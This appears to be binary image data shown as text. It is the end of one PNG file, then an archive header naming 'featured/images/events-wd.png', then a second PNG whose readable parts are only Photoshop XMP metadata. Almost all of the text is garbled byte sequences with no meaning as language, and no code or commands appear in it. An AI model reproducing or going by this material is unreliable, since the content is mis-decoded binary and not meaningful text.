��9�/#]~>�5�c�3���Z�O��V�V6I�"�U�?v��Y%A\E�GK���0��<��O1�=�,��H�g����B���X,~hff�	ǿ݊c��n��H ����qB�@0r�=�5�������%�LAѩ7�&�H7�EЄkr��_ÿ?>�O��!��;�"s�{\#@q�K�Cx�t�bE�t'�_#]i�(N 0��s�s�m>W&�.����0m�ȇAf)���z������'�[����޹@#���������0k�ڛ�Ѕ,>~�+S@�'������"�vA���!�ӡ�c��G1���kgK|����^%`� �H���d���I���ů��1m��1�	0H}?*�4f�;�A�+S@�%
:މ��찏���x;�G��:>�T*9��#�F�����	��w�<�y8_@�8A��l6����_>��W }.���s�x��1R���+���A��D���t[qb��-��#'�Dx7�N��%`�t�P$�8ƿ5�O>GD26I�����K��¤���J�!ŲZqG;�?!��H� �}�;���^�!����r޽.���B��
@���>��~����O�~gJػs%���c���i��qS���(>�('�A>L�8�҂o<�e���&��i�Ì2�	�@��T��'����zʲ;�>�D��e�;
��I>o��R���d���/����+��
�]�و�(G������ʂ��.�j�׹_^��%��F�~>�J���7�\�R� K�A?L�ڂ�O���J��;'�H��2۔G��K���$#��Ӂ�AD��t�R�
}��bV� ŀpK��h����kYΝ}�^4c���V��ɕԛ1̖
=AA\�Ĉ��~��7(K��[	�B�/��H��C"�YmX�R`�ւ�z�vxh�v O��U��)��t�U6��wq����g��xk;�T�@(�,���Z�	a�X�r)��p1
Y����b�@A�y��圃����H�ae�͝�};���{9�'���T��AG/"����)5r�1m�`�We��Ԡ�hh�,g�4�N����W���wV
pݥX*��`6[�"r�?F�.|�q�A����j܅�1	vLP�ن�s]�j#A �P��Ш%��Ɵ�#�gO�c���29��v��R
,"�ˏv(1P2V�7�͟�����|j�	�>@y/��M��F��"p\��}7����%(^���M}әG��#(���\"��]��XgX��75wg��t���y�8��#��oh���IG	��.C�~�fw��:@b��	ZL1~6�D��~LA&;�H��@��m Wl�l/��e������H���ȹ�o���$.,�H�b�Au
�x�2��Z��V,N�d���.�����#�ԈQ�ϔaqnfBd�I���!D�q�*�dGx"B��Z��G��=o˽σ*��KdX�9�tD`�_�zݹ�_?
���Bsf�O�a�=G�3P[��N�Mf�4� �80��-f����� (���T
�GsVV��Ӱ^[G�&-�c�o��$�B�G*�]۷���!� A��L/a�!A�q(v��0�p>� nqҏ��謁�0���a?~��`>d�Ǣ����f�Dن���jj(�C#�g��wh�};аr��J�K�s���
Ǟz���S�j�x���0,�FiA��1��dUR��x����0Z�z��JR���"��tK�@ϭS�univ�Y`�nA��A�/�-�pV@�6��|70">~���X�q��,�Ș%`TPf��
ߢs�+��`7����g�,̷��?<�u����a�P����^y���]���:��a_��c��j
9ɡg��o;
�QA^��tZP�Ѯ=�6�֤Gi#~�aؼY�[���د4>?��g�;F�YD+��ר/�@Y�(4l�(�P��3g;v�	F��8`�������&[;&,þP8�����sx�hn��W�O��&x�U�`�B�gK(���	9�
B���O�����ԩ:̗cܠ瀚���f�q��|Oo�'�sJ���w���5iP��+����b����8�F[�-�߅��1N�%�	<���=v&6Qܻ4�����{����7�?�����/��K��b��y�ؙt5}��T�SPK�P�t�3�D$FP����V	?L�2.�8�V���\�:��AL@;Y�o��G��R
�aI�4�WP �;�R���kRfX�C�*<z�E��7��o~��
}���5�[Mv��r��':�
Z�������,>D�6�b��uO�P��I��6qi�Iz�9�H'�Qdyƾ'0���Ćgse&��E(Jl� ሦꜟ*��
;ig�Ǐ���0��k᎟�g���.�A\�9LO��{��7�d:���M*�
6u�����'�_��	�	A�Q7H"�*�0YTR7QQ,(�C�f��:��\�Hb�ar>-< �a��U���OA<�
n��&��Ҧo�Jv�h��dPH��ň��0�5d"Ա
M�8PH��_�(��~t�Q��͝�NV��w�H�S�qr	,�(�<�Q��D�b�dǒ&eK�(Qv���I8��I��>xݍ/)È�V����"a�ᇺL�8J���@a'�}m�������H܉q��'�
z
�S'>�CX钁�.:�CԊMC����+M�u%ϧ��M�0
aa�j��>�W\������^�iPx[��K:řZ�
]̊��)D<(��N�]��
�{n�����6'B|N!�Fn��7(��n.C�͛�Ij�\-3)/y�9|��X�)�>�b��jCd,Ǡ��Q.����@�͗�[���	�K<rt>	˫5T�
̠�J���ϝժ�|i�=�,����Ϗ}�,R%�N,Wd�)P��mFɖ��R6�'�
*�t�1amu͜��S��<��7��sQ+P��C�H���)"Ǩs�Jijl��U����P.a������[ϭ����x�ѣ0!��X2���"(�L	j���(>PXtR,E���{(���H���.���52�ύ�Ɲ�뼖
�#�#�PM�J��x�u�eI�4:�	ł�Gs��H(Ȇk4�pzu
��)*���w?r�|�)�1A�2�Aa�r8��5�Jb�\i&��nW:��O�ȈE�r�7���#�l*�	?1.P�>v.�4pc��3%�mM�b���Y��"Dyr�¤�H8�[��"��-�5(�+�RyfJ!'��(���>z�O?�eh����p�CU�
��=ĔK���:�lS|�1zh�����S��w�%7n�[��q�b�0��r*\Љ:��5
���'�)��(��ٌ5��s�Ŧքu��c�ay�A�a�1'q`�;�.Y��>X"�ɵ&{q�_<�x����a��D���Hᜟ������"�WF���5�$�I:1�fZƘ�3p�(��n��

*m<���X*k�&V�r=Җ��U���)Rpf����N9O�NWWA����TB�	�k��Wn��܃����@��@�P?�<T�U���V1�u0�!�}����jp���Gm]�1��xl}���a_�X���S�)�x�7*(n�܌�l'V4[�ŭ�`�T�,��7��aC�VY^^���~^y�>�醫`�(Jp`oV�pݵW�5��t{K��9K�̙(%UC��قCO��/�^�B�hע��Aa�Gd
HX�d��#��w��c����B�b��"��X7ueQ���Aa���YB�
|��K�7� ��Gn���b�eTnQ�`J���Yx�]	o��
k�x��*Z3�
��}�\հ{�Ɯκ�<Of ��1l����)�y���G�/x�~ �QAq#L�dZ�6���S�21��4m�ŠWv%���JZse(�j��f��(�|o���Q��BRɼ�Y��)#@�Y!���W�%�h�%Y��C��5��I��}0�f���ƒIr4�z�.�2���`	��*� �5�c��`m�3���udI���G�.X��Ň�̶ʋ�(x飱�������R��͂�p���Y�y���IN��mWᴃBZd��	Jr�5{�'x�4��]��'6�Jr
�\@��6pPZ�n�֤M�:��X��ǒ��7��論�\�:=�3&�2�ʖ:����g$V%`l���$�A�Q�j"b���+8P? �n���'!��=X��*�0���'r�Q@q`�BÉa��$ES�Ya{"2��"K�e$	*�hD����=�Q7e`L��H�P4��/R5�X���d��=͓0��^@A܆��:��$�q�0��S�dª�M���q	�>��Ju���Lɤ1���b�t
�R� ���-�hj{��N�<P���x� @%쒷�8oGť��;V���04�Z��	��M�Tj��x�Q`�TZ�E�օ���
|��۶�*S�;����߳W�_���̆���քG�9�;ŋ�)O���\�<��γ�g-�"0q��+��\�:�8+���e�W����������K�2��
1nA���1'�I8n�C�[H�
J�!��-�Fvo�����~��\���:p�X��x�[o����l�{��
�g�=�~�(΄��I�䴺l�������A�,�IVr2�!�� �(�p�nK� �c�(��9i��#6<��F�0d��uīis�R�(�P.�9A�j`�����
�_���.�av&�4�o=�X�U�n{9��8�V��{z�QP���-;�xk%�¼��T7�E��EGf}$)(��&
��d��m$PL�:n�l�Yԙ��ި5�E�D6��&!�#�+J�-@"���zG����m�"�o���H`��<���I���Z�d���EqQ�>����ͬ������6��S"m�9�t�$m�NM�6��ԁ[2\�6�f�q��Ę�d�2�B[�+n�((������
��FLS���,�z�V�A�M!�u-Mʘ[��*��!�3(#*��4)�Md!-;�	�r)�+�Y�nwT��Bu���f�I6��h�F�G�ܤ�G@'`�[
4�l���
�Y���:�(ҩ�!P�)��:�(\:�@-n@�`!�o�y(l� w��&+��@���C� +[�~�ʟ�V� �@3	��K�?�bW�O������"�����)'��Ab+Ұ�QTM\�>�V�?�����"����D�Wh���D ݒp���3"d�7{3�
z��;�/�V�M���8�̘��a�$��$�EZQ.�~��z�uL���T�ѳ;YY��q����.�_D��MN�P��.�H�+n�RFvk�����z�.`���]�J��` q��Yp��� �GEk���g�3+Y6��0��Mb]�o/qW�恃f9�����ȑ�����вg���ּL1�������D� mE�[�eE��N|0�I$g�\��)�!����}����&�,��V|��Xna����.J^Z���v�2�Aǔ�ԂDŜ�a-��u
ĽX�+�h^�,���'ѦS蜢i�e�c�a�g�c�>��9�q��8�(�79��'���fZ(w�3ɑr�.��%�p��/� 
��*�B���Q��Z	h�[�U��[3�W.}P��K\ٞ��c�S�1�]���Q@qr��J��-��
6A�x�m��4��-@�Y9�t¦��I.o�͇0� }���Kga����uH����< �C�9��|�zN��hy8@t�+F�щ��}�?�	��G }@�,OWZ�V�Ȏ��N�:����D��D`n�q��'π��/u���3G���M�
Q�q4NqtP<}6<��:I+����i_�f(��`q<C�YbՁ�#=D��^Ҵ��rv�^`�������ҽ�ͷ���&k��oڭG�"�F�E7}"�̇G���q	�h��L�j�I}L�
[�^�:�xJ<�?3W���հ�vH��X|��B�rZ6��E�HN�8�G�> �.�r��
/ih�#q;tN��@�������/�C�����י���rZDRӵ��õ7[�5�m�0��¸��G�R�ff{�lc%��	%I�@a2G]�H��*nDN�DP<1
(�9I&��R>��FD��!�,�P��7��d�j�&U��5ق%�Q6�E��:�d-�-=-rM�(�f���S�W��()F�@hSBS��3]m��q%AU���}8�7Ge���YZp����� �F恂�����D��� �ش�\��"��8sXs�����h.qƞ=K���a��^�Κ��(�>Dw�A�$>|.!5��8
}2��}�(�(�$&��S����(LŇo��:����Ab8�N1�X��J�q*��u��M�l"�
�yk]�p�r)��{����h�*TQp~���/\e<�V"K"E���Vd���5�A�~�Ķ�"?C���9E$ɶE����#3W����N�q��~�>�al;S���!)���> ��fG�SZ��$`�a�;��3��(������j:��_7�������
���PR�.�,(,ǐ�o1���gV���$����+�K�tՙ�}'�
��Y���m%(J��u/�^���q�lW>�3�e�cP�*�R��(�(_�س�X|n�7�[1�J&�An�X�!���\=�aB�S#��YrB��86Z�E����t˭��A̿R`0�@�2||�Ca�|"&�PmZ��уS��x�
�ep/�X��Sz��q2+
;�B�YE��Ƨ<�jWe�j���%H�K�^a-t�b��4b}�7T��9f��/�g�f��J	���e9�FT��di]�t�f�}���)�?7(@6�#��Z�+%�{}�>J��dV���CѺ�&
��ѧb��-����V�27%�0(���R߻G�gʠ���c`�dQ�r
9Y+d��;�K��jq�6�% (���/
r�AA�gH�1׽R��Բ(( ���*,�S��#�y�c\���q�,��!��.,K�;�V]�Z��֡��m�L՚�`��n�@�\ �x�h��	s�Y%�c�؋F���`ؙ��#�.�����8A�((�����[IzU݄����1Y�2�C�;��}'���4��nFR�K�"<�����p�=ߔ�v;�m�@�����p��@+��d�N+�e[f7I/�c�}�!�ٻ��8��W�_�y�(=��)‰�*ؔ� 0�{���������	
YuX��P���W��q�2[LQ��t�q����p�VW����/��=��߻�{�{X����)�xh�S%]4-+;/��e.A�H�o�R0�M�M%x
ƥ�/��J����b;ǐ�ө�R�p
��&I�^���A��ƅ
N�
3�颥N	
���_�X�
��*����M.O��	L�V�3g� D+`~q컺�_8��(�&Sbsu%J�a����Жoږ���T�q�f�f3.�ς�l����]PT:��^�2
�p��":HV~f�X��q�
R}�ms8��|VA�V��u����
&uv��3��Z��Z����5��a���]�&�(�r�y�H�����S����>���Jf0�q6��cP�����
��5�
)\�����%�����"��I��ڧ`��}��]o�f��̐��'P���cXY]��j��=�%#�(F�[����N�t�U�D��������U�3���|#Q�HK�c�Ǫ�V�2/L?����K8]����w��aAA�.h��W��[�>]&�����.�D^IA`�յ:�����z��E����f�r�B�w��s	 cK��L�lB[\,�:�+�T��P���X;}R���P��tX.A[D��4^w3*�F?څ>6N��mh��J���#ɴ�h)3L��B��7[PES�������wP*�R�"[/�Dk�r��[�+ۗ&:
�S���]��f2mC^�kV�`�廡���I�Q�8�T�¡уK�ư�R�臻�?Ň|/����Kȵ���I�����ʵ�)x	'*��Z����_�7�+T�u>6�-�n���F+���vOX��-��!T�<�|E�;�j"����AΊ*���f��q�N�^��5 � @��O!��XA�#0������إZ��ڨ4��af�
�4AJF����]xbh֩:R�����w 4��W��-p^�^
e��P"z����6������ϻ�o�I���� |�
�X�6?�简˯�™2.�]�
b�уK�	�X�U�H��e�"�߃7��Im�X%,�S�1��]/�'��"���x+E.&��Q�2�CZ2�-���<Lڨ�8C�mv� �
fL��p�����%R�&K|�H)�q�T	V�I�06�m���]�;w��
NWv�JMC�d����s�Ć�\��mfl6�)�͏7���Ϗj~�����(.����H�uq-J�3�o�+�aR�0��I���rJ�U|�U��n�B�:R��g_���S�ڒ���傮pl�1R茼��`+�"�,é�Z5Z}��Z�;
������ؽX�y3�N������r
�=���l'��X���۰�x��<��lɂ+�f�`9r��}ڋ���9w���Ӊ�uL�(q@�|\�C��k[By:ԏy��[�\����й��D�^�:D��h�{�Az]�����k7�)z�K����0�Fq3�)X��c0{�Y�Q/�a�Ɇk	���@���an':���VSblv_n�|���V\{����d�'㶛���H�R��o��#����p"�©���EJ;��0"��פ����.�c���`|k��h0�P.Q�/��7+>\�G��C��f��Ho��%�����A���a
u�j�ʯiV��m��|���K�]�����n/ps�o����.~��ϾsȽ��,���?H�F,�Ed�333L�r���R���R�Ԗ*�+���r�A�G&�8H$�;�����m�&�%��`Q��@��k��w�o��o|������l�eK���F@P(���gR�&k�~܂����"�]A`x��F᨜�������X��1�Ѽ�gug��g_��P7�np�M�� �?[�Ap��;=w��NE^��<QiH?L������q`#NI��]��O��'�(ؕ��kx�P/��g3Hg׶2���oS��i�oot���}7/
���>8|0�����[�3���ߎ���t3C����|->�&���u�=?H�3\���n��n�~��h|N㸟�^���Q=�/�>:��g!4��Sx<�ȿr�r���;��T�=�Ϳ',�Z�����=N� ���>z�S"6�V����k��~��׹����͂%�ٺ>u��M����
�U�{ƞ�=�C�oF��}��]����xr�+͎[:v�)�dRnˡq��fB��_"�߁�0z���\H�C8�A�{�N��<ʓ��̈́�m�ƇZ�k|��v=m�)����!��*���i�Q�A���!˥R�N紙:\׾cj��;�_'y_���!;\G`|$�"�LSq�;b�\�������l��9��[��b'����O�rw��'��=�%�}r}}�r�?)�e_�\��]�N�C�U]�h�����(�}��x��#0�����5��D/%5Z�&�|��
j!0n�θ�q����?P渃#_���� ��X�s>���q�1�9vԯ#������y0���`ю�>��^�d:�DA1�`�܁�W�Q����>8���cy0�K�zT�u�*��"1笝ӝ��݇�W`��W���H��l�\��V��c��)��Z}�@�o#���;pт�kU�_F�v�'7��s>8�@�l,ߢ��?��N��#�D�*�p\�<�;�g���ĉ�|
]�M���<W�+��O��ю�M���0ư��v���4�g�sgܻ;򉶽�G�Ҿ��|?}��
>W�'��J��Ҩ�Ç�>��s�Z�uO?��G���#�6���8��D�����c��K0�n��A0�=��[`��s��ߺ���X��q��ÁU70�G7n�-��-ϲW��@0�o���;W&氠؊�W��S�kq�)�-x�&��3�(Dd���6��8�g������r>q����^߈t;���wW5>���(Τ$W�֪<���B���A������x���A�&��.��g�߀�bKt.�V���|�"����*�#]�t�r��HKH;�*r$�&Ǔb)���,جi�Q�a�'��y��Ǵ]�m�5mSPL��6ŴMA1mi�_�m�2_٨:�IEND�B`�featured/images/events-wd.png000060400000027442152434416630012247 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:FE45EF2ADFAB11E5BD019E165FA1BFDE" xmpMM:InstanceID="xmp.iid:FE45EF29DFAB11E5BD019E165FA1BFDE" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>?:�!+JIDATx��}	�\�u�y�WuW�{����HFB 6$/�
�;���%�q�e23!C��1c���������` ��kw�����՜���Z�KU�K-�u�]UWի����s�s��*�d�J�T��Rj�R)��TJ�(�(J��R)��T�Rl��/互�b��qm�Z�W�����k�k�k��^{���z����؍?ʯ��(��p��^U��'���������F�0���{ǀ���\�p��u-��i������t?�/����^ΗFT΃��z�7p����Y2�*��+��k�G�u׹�)�UP,�\o��œ*ܦ�Y��b!���,�����f���z�}��0�m�A��~�C�@	�)�:>ϵ�\Tkhc�I��c����.�b.����^g�����0����n�ۿ�t:�[���?_)N1�{�8��\���8�A6����p��r��08>1e0�nhם\��k�88�Z���ƿ������(��
��u;�
�(�� �/�oO3�r^��2�op���aaw�ְ�9��c/v9>����N�۸.�wh1�؜�g`<ß�E�m�-����z��T��R���p�Y��q���֌���~K�T�����@��
�n��W�g��^�ϕ�ݜ���g�q}No����5��$���9����[6�1���Q��b��/r�璸�O@���aSR�_}���.(�н�R��@с"z7�O��sWD�)�A��;�v߹���ޒX��1�N����DF���K��S�?�s`�ù
Cc
���h4��_?~.xp}��I��B<��'*c� ����}�`�s���XX�D�^~�;r�\L�$.*��81T�{!����������q}�'Q�~�c����
�z�ݳ��=����۵����a>N�h�������L��z/}o�
rq��t�Ұ�4���I0����u,h�R��\"���O�����W��h(#�E�1����R%B�	Fi4��PT��H���"�͒\��!n���67U��q-\;K��G�+��{�����W�򚲂0m�(P wq}���(�
ןsu��)E|�գt�g���9��G�v�S��N�}!y�e����orO�W甕^|��.jp;��s�њ<cP|s�q:��:~_��߮i��7��+40�?纎���6(n'mYތ�P8F�y�h�l%�PE�������x"�
�c�'Ә0C#b���cM��[�4��M5V�0b�����ȗ��5�.�r�_��X%Mz��j!p��I{��R��*bT1�߸\�}�t��	�n�N:�ٗ+g���n>r*Q��SQ���		�&��!`(B6M�%�
��-��A-������"\'s-(0�M>̚B�2ǒpp#ē�qO��Q��и'���I���zS��EL]aQa�0��+X|�ؚ����}�tT���^�\%$�L�L�ν��C������,k���4W
��][�<S�8S�����<uj���T�'VΣ�L��ʜ������-���5~�H/����}�.�P\���n�.���Ȝ�Y[�����/��x���]�i�@�R^��_?�u&o�:��u���J����c�Ѕ��'m�������i�����,��5=ń�P(D�@�"��q��ZFZ2�	e�ҥy��|>� ��G���J��p�bq
�]�ڭl�5O�k/�����h�U�"�ׯr�ə��$��yn�_Ϛ��k| G�+�ᰀ�{�����oP��G0�V����Ĕ�x��*G�r�� �!s�1���f��d��g��u�
�>�m��E0��Y� �y�t@1�.vE���\��xz�>Nф6��d�|*�
UL�����N��dl�����JZ	�%��H2��xI
����t���p.*x�fP@^��L����0G����=���=ó;���͎�)�M�٪_��ΣdD��I+������J�gI�*_MIRe�O.���֬~l���Q=󟋛*�
�p�A�'k�t�@Q���x���s��س���7@�<�,("�4
���ﲦ�@F��`�CbJZ=�H�i�;ȣ���^^��laV!=�f�0�6J{M����ݻ�
qي���(SB���|���)�A��$I����]M�b�Jb<c0$%a����u:�_������g4�f�U�I��B�{��D?��A��ڣ�)��Y&��^Ga�hnj$��/�r�5�����"��4L�YS�rC�_�
�[
�n�u,�	o�}�2$n3�~)V;�B�Z�OnZE{����E@��XEKآ!������~}���;5( �(:3�ژ�G��QMw��Q��J��Pxh?7�U7;ZH����}�mt���_9BQ�O����5��}�����Z�2K��Sy��6�C�$]Rxէ�4��=#�8`<%�Fj�G��T�z���<�3Oc��ul�������-��w(@�ukT�s%qJ�f論�+Z��f���^�Kx<N2��Pwm=��h$�Ҷ�a�LB�������i~m�kڬ--~ ˬ-`�	٬˱sRPM�Z�".1��pY-�=_�*���&�?ƜC#z�
�&����Xo��8�v���9
Ob���LP.u��*]Lb�j�j��YP������T���B����1D��.JF"�k��Tg7™Ƅ(S�S��tܣ�QJ�vR2�D�΂0�|<0˰��J�g5  �@4�8�$�x01:���0����A6g!
 x�qM��``%��x����ª��HY�~C�̇����|(��$4(������1*l}TO-b��Y ��~RG�5u	S#�_m�f����g
��&�c=0�ԙ�Ţ����G�1H��&J$�����X��C|M�Lr�M�a��͒FS�l���Hm\ԕ� �Q�$bƇ��U�{�
R�ԣ�BO���3hT߈&	nA�W�9pM�Ãb2�Qn�UF3�"1>V����L�R|d�Bc1r󥼬��J�(�2�H�⬹T��m�k&���Kj����y�G��s�%�| �J��+�d�p���ML�ġ��h,N�h���]�˫l�z��Z-�C�$�X�7{݂�5�VꮱS���®q��g^S-ٝ���(���=d�r��k�)b�\-���jk�.���?��l�����j l,w�kLM�`�L������2��-�(q�4x�������~��-g�����U�9nY�AX֖�8Xc,û��h�����ԣ��5;�߽~�h��L����P8*��2�¬%�m(trO��X_\���*^8=J���8ӗFgM��޽�e��m
��h[���s�+Κ��Җ�rj���7�%}[woǏ�hR�FK�.b��ban��QT��� e��Y��U�i(��O
�&0_SE��	�Sv�k�������r%�m����@��7O�>��#EL��`ݰ�^@Aߵ��i�p�h�lL:�r�Vz�wG��7�z�8U�\��c�QZ�L��W_L���<p����X��Ob
2��e
��+dL��W�Ȱ���q�&�-�]L�,m#��6+q�l�B/-�\�f
�5��@�/W)�Oۇ{�e|d����Ə
S�!h��gC�Ws	���	v%��5�hs�4o%N�Dl<z�d�#�F��\�nٸg�9BO'Լ&����F"��t�9ζ��)fe/
X!zht�.���W�'��	^A��O�3�@�L(�z�:�H&�
�:�n��i�'+�HB�X�b���8���/a�51Kۈ{�!D_�ՠ͌�\�!���E������DF�)���\ܒ2l
�A�{��g���'b"�8"�l
#�*���F�h�]��`�����-�5��*���!�H�\�Y������@�@`���[��5�T�XE0�ͤ���/�M����eR"�qU3-���a6?�]��x�M�{ �o"��3�1�"j0p�L �m�������Y�5�Ld�Q�F�*��>(Z�}�P�P�NV�h�2�B�Wzl��1?ӭMZ���(���d@xDq\C�M{��X�\��2_�y�5!b�C4Ne�뮫 $/,@E����m"f��2-~��uU?�����kJ���$��a�s�S����﵁��q�훖���y䰝Q�I}EXG��eMm9=p�z�	��	Q4Ɗ�
-N���65l���ȼ�'A5uT�e��g׶��jL��~�����&�,�:��W��h|%9��5�c��W�z�c���+�{J��\@QWtMA��b��MՈf=��{�%m���sqC͔���P��r&���7f�A�S�J�19��dE0-फ़:��ﰌK֢F���g�����
D�-��E"T�*c�W�ikG7h�9�OQ��}[�N����@ iy}U�㊘r��p�����h��Q�)
��`�ˊy�X�O�#�������.�H8.Q�fO�'��sif�{r����Pd��/��=�~��n%V�6;<�G�,nPѷ^?.�
˘*�;'&{M[/��u�y[p`$@/t�Ы�c����e�Bs�0�u٩��9aE<�ړ'諻�R�?"����5H@�^-�a	�#P��N5����*��,6-V��&uԞ9N��>b�@�Z"�צ�'�9���'����94VT��6�|����v�w9�5zx�q�e�g&������1��"�1>���敻���e��bV�M�M4>S
���`oe.�D±q҆�Uv'�PCr�1 ����aY����G���365V�:�/2	�J%ҩb�"�q�z�)���Z�m6;�pA�0W0o�ܚv���!���|:��φ�1›�#b�1̾���1���^�::��"!����$ ��{�K&H�tU[���.�ce>������a�B{ ��g/h�J����m�CT�@Ųǥ����UH`��`.��͆����9է��dȧO�㞗��/�o�B����S�>�ŭ�*ފ���f��@ʃo�>A??xZ�:�G�6��#lJ���'O
�����D@*�~`ap��Ӏ@�c���?-�K#�r߱qmh�,x[f��\@��/,@�
c
J�z�Cd�c�J��Q��SwQ�NPl��Z�2���n'ʓ�O[_`&9������_xW��8��Gؔ@{���DZp�yL*���ñ]L$��W-Z�@H�5��`2��+8�$�z���i
�(j-���7�'�tP�4	^)ڴ+�(˯Kj����������j��&�"�ic���i��Bb�����J��6
�`Ħ���z��}貖*�vfp�I���~�(�1�t����-o�u
��=�
���4�b0P�F�
��z	���l
���ҍy���.�C���o�@@�_g���}b������f�z>d�����K=��b��u�I>����u
�C�{�tW�+\��D^�(��
	���q��=����w�10_aY���j��|&��?`�pZ<��X��g^���o�9!��������뤜�𽽧����U�铫��J�@^�
�Y����"k��\@qb6�W�?z���
��A�B�c2Hv
{�iۚ�ey ��9�K���ч�4�͋�3��_�;
�ݹi�t*i���D��)�+*�#���V�R�Mܿ��M��v��s�rY�^H>���Ye0���Z��X�#��
 0�����n����i�1�K�f�|�9U@�U�!� ۢخi�3ah=�ԿZ�*������>���4���	Gf+�eQ@`�_D[2��x��>17�`㏲�!mi���9�+��^�T
�e|��bi�E����-B��`�9A�SC��,����@q$P왵������n��G��Ō�_!���bB}_��e�p?��)��u�N"�rjA<�i�8F�O�% x�vLW��|�M	��?c>�-��L@�ES�����Ul<����G��S��b�H[��J�(��QI��b��#�� ��1z�����}�!���oҽ�YM���G����|i���T�5��Z-��98̫�(��n�2�{*�@�5���k���)Aen򺝒�D���ESa@�7��h�v���*�f����=�_�%"��eGFC���8`�N�rQc}hqU9���v���n��va_�t	��zf�;��>i�O�۩��*�G"�͗7/#��v	B�	#Y}�gZA�l�Kd�A:%�~�S����^�R3>.�ř��J��(Ȏ��8	^���(Z�D�f�}LV0>���BRF��^a�L����k�U2���� $���Eme����`T4C��!y2Dͳ��R��
��������		^�{[�,L�8����yr5��ҁb{>@�+?�(�dD1׳�m׉�6P�7�^�*�Q�LsO��nc��U��{A�D�4&�T�}�Ѽ"����\9r<_H�$t��#K��c>%��xu�D�Tn��X@�.%�/��0���y�`�)1{]@��Se��,|��$7�TA��h����>[[)�Jmf®{6�;���]|2��U���y�sBq�\S^�iO�t��S�M�&ײ��-=���� #:+�b��Ok(;�7#���QR˥����9���p�w��TP�1x�)q�)^�S'([
!��M�t��v�?�8HK*��nճ�d�w�4�mj�(d���P0a�Y��si�|w@�5�B��)������~ju�|?�ԡ��0����`:^�)dƛ(P,(�c�ml���
��~�7��A�X�l����̘+�tk�������~�u�;��P��%k4�)�I�z��Ƈ�}Xl�����/����A��������,�F:�I�qq�~�5�._@��:(�%�a�᠏�l�K�f���ѽc��N�y�L}s9#of:�M-�<�	�5z4�Y(u����]4���PU#�=��w7*�u�G����rr�ʌ,E&~'(�*�㫨ll�B5Mà��'U��`�$Ur�����c]}u
-ok ;����`��Ѕ��Wf?K�}i���bI�����BfTͤ�c*����޵|=��iu��DƷtг�O�O\۸��sk�_Q�2�
���j
@���h�L�,�}����06�~iH���q����7�_P?v�v�����ɴ���*Z�h1E|�Ժt�57�7�ۻ_�����^���o�>���?��z�;]��ÿ��+V���d�y��ר��K#c>zcߛ�|��t�(	S0�[�w	���P��:D�������;H��G�fs�m�ulz�QE�'(2��l��n��,�:����x������M����孤T�em7�5f.�%`��i�y�~�ME��Ǟ7ޠv�L�/���������SO>I��t�-�\�=]��SOS˼6qc_|�E�x�f*//'��)��|C�_�����W��5����F��s���%Kh�����H{��G�U�WRۂS�p��}�C��x�����IqhQ�d�Us��4��~��uV79�F�h�M����Oe��%g�f9.��<��?����w���Tް�\�'�rUN\&C�	(�0�뙼�"�i�OQ��n�]l�����EK����=N�����ӑ'i8�k׭u9�B���['�ktt�V�]K]ݧ��?<M7�A-3����,_��V�ZMU���}��W�ʕ�@� Y��⢰�4��'�Q�ݏ�r�ߥo��X�.�]��KEl�%�|�����gk'㞑�r)Y�ہ ���Rt�u�M?p��^�$'@d�ߜ�����i����EEE���g�}��o�N���
�|>���M2��رcr��'���Z�!d``��y�z��56h����/�Bo���ܷ]�Y���A��Qϴ��,,��C"�Iqߙ�T##~K�|$�!��̨f|� %"�h {�r>����bgb<�Aᗩ�]wPպ;�|�_���u>A��?�Dx`ڠ �h	4�/�+���"Ò�_�N���8p@�b[���&¯�����A���^joo�loh|�g�1����f�����Q���Kidd�~�ajhh�ߙWbk�,噝Md/kg@�zb���GP26Jv���P/�F����,Z �;"&�V��q�8��� ���,Nm8��i�s-$��<�0Ez�#g�r��ٌ�AK�I3X�e���d(?������I�%�K\s�5�ѡeT�Q��㩧��/_�\�a��h�"��[�scON�%C�]{�A�[�p�ǟ�H'xVGp5��v
��,�c��9��s�a
�d�1�LFɷ�_���"H(�@��v�2qt��7�<�D� Φ�<�[�Q1O��ˆ\f���r���f�ͪ)2�8��ȗ�0	�Bp���(k�@�<�裢
�,���<�
@al���7�n�;v�I�
]�GƮ|�99#�:���U�j��5�����8�ד�n���с���}D��>�.���⨜Z�:g�x#*��r�)h	����/ª��
>�PT3郀 <p������8��O�0 �'O������m�6�#pO��ƍ�~�z:}��ܷ]���r����ɩ�A@"�+ff!��³�ʇˉLz��L@C�?N10F4�J�$ǔ#�E��e{�O�l Xeh�4f�Y��T��"e��/0y{7vN�6l�@~��N0�ăBXx�6m�D---b:������K����������Z���]ۛo�Y>onn�β�]S� �1����W#C����e�!����Rϖ��ܣV�H"�%�4�މ��AV��v+Vp�DX���O����f ����7��c&D�\��P�ƶ�˹䁀���륗�\�Rx���E]$Z
4S�3�Qv��M�]v��G�Ҳe��矗F��-ndw���{hTx6h�%K�2�4���gWt-�;�s	پ����f�޻Y�o�0s�Hߋ�rG���T������
�!�$�Q�z�P3 2�Kl|�V����1;I��o,��@
�o�^�I���n:x��S`����>qI|�c>,
�b�
9�"h"� �9p��^oo��M ���U܋YM�n�h�K�!��^��(�+�5ܵ�=��8k5D'���#���IO&�����OS��C�9�j.`Pm��#@#�i9ܝ�9�US����i'k��4��K/�4Jx�ц7bJ{xxXH&�O�;w��a�;��ٷo�:uJ>�{�&�.)\�=��ɏ��] *�&���b���h�Z���M����΄6��
Œ2v�����{_D4���zB��\�?J��֌alt�;��Hc6��&�=Qh�i���wdqa'�>���ы��A>�	�~�m��ȧ�	.\(�
